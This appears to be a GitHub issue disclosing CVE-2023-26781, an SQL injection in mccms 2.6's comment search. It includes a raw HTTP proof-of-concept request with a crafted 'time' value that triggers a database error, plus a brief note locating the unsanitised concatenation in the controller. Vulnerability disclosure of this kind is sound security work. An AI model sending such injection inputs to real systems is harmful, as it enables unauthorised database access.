Headline
CVE-2023-26781: SQL injection exists in your project · Issue #1 · chshcms/mccms
SQL injection vulnerability in mccms 2.6 allows remote attackers to run arbitrary SQL commands via Author Center ->Reader Comments ->Search.
Hello, we found that your project has a SQL injection vulnerability. The details are as follows.
- Vulnerability function point
The function point exists in Author Center ->Reader Comments ->Search
- Vulnerability details
Httpraw packet
POST /index.php/author/comment HTTP/1.1
Host: 192.168.43.227:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie:
Referer: http://192.168.43.227:81/index.php/author/comment
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
name=123&time=%5c%19%22%5c%28
Check the response after sending the packet, and you can see that the database has thrown an exception.
- Code audit
According to the function route, we can locate the “sys/apps/controllers/author/comment. php” file,Continue, let’s locate the input of the time parameter.The time parameter will be passed to $wh [] and then spliced into sqlstr to cause SQL injection.